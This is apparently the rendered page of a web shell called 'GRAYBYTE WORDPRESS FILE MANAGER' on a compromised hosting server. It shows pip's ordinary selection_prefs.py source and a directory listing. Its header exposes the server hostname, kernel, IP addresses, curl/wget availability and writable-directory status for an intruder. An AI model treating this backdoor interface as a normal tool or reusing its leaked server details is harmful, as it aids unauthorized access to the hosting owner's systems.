✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.36
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/python27/lib/python2.7/site-packages/pip/_internal/models//selection_prefs.py
from pip._internal.utils.typing import MYPY_CHECK_RUNNING

if MYPY_CHECK_RUNNING:
    from typing import Optional
    from pip._internal.models.format_control import FormatControl


class SelectionPreferences(object):
    """
    Encapsulates the candidate selection preferences for downloading
    and installing files.
    """

    __slots__ = ['allow_yanked', 'allow_all_prereleases', 'format_control',
                 'prefer_binary', 'ignore_requires_python']

    # Don't include an allow_yanked default value to make sure each call
    # site considers whether yanked releases are allowed. This also causes
    # that decision to be made explicit in the calling code, which helps
    # people when reading the code.
    def __init__(
        self,
        allow_yanked,  # type: bool
        allow_all_prereleases=False,  # type: bool
        format_control=None,          # type: Optional[FormatControl]
        prefer_binary=False,          # type: bool
        ignore_requires_python=None,  # type: Optional[bool]
    ):
        # type: (...) -> None
        """Create a SelectionPreferences object.

        :param allow_yanked: Whether files marked as yanked (in the sense
            of PEP 592) are permitted to be candidates for install.
        :param format_control: A FormatControl object or None. Used to control
            the selection of source packages / binary packages when consulting
            the index and links.
        :param prefer_binary: Whether to prefer an old, but valid, binary
            dist over a new source dist.
        :param ignore_requires_python: Whether to ignore incompatible
            "Requires-Python" values in links. Defaults to False.
        """
        if ignore_requires_python is None:
            ignore_requires_python = False

        self.allow_yanked = allow_yanked
        self.allow_all_prereleases = allow_all_prereleases
        self.format_control = format_control
        self.prefer_binary = prefer_binary
        self.ignore_requires_python = ignore_requires_python


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
1 May 2025 1.22 PM
root / linksafe
0755
__init__.py
0.062 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
__init__.pyc
0.299 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
candidate.py
1.167 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
candidate.pyc
2.089 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
direct_url.py
6.738 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
direct_url.pyc
10.5 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
format_control.py
2.757 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
format_control.pyc
4.2 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
index.py
1.134 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
index.pyc
1.69 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
link.py
7.295 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
link.pyc
10.831 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
scheme.py
0.76 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
scheme.pyc
1.298 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
search_scope.py
4.64 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
search_scope.pyc
4.489 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
selection_prefs.py
1.996 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
selection_prefs.pyc
2.068 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
target_python.py
3.939 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
target_python.pyc
4.411 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
wheel.py
2.707 KB
13 Nov 2023 9.11 PM
root / linksafe
0644
wheel.pyc
4.407 KB
13 Nov 2023 9.11 PM
root / linksafe
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF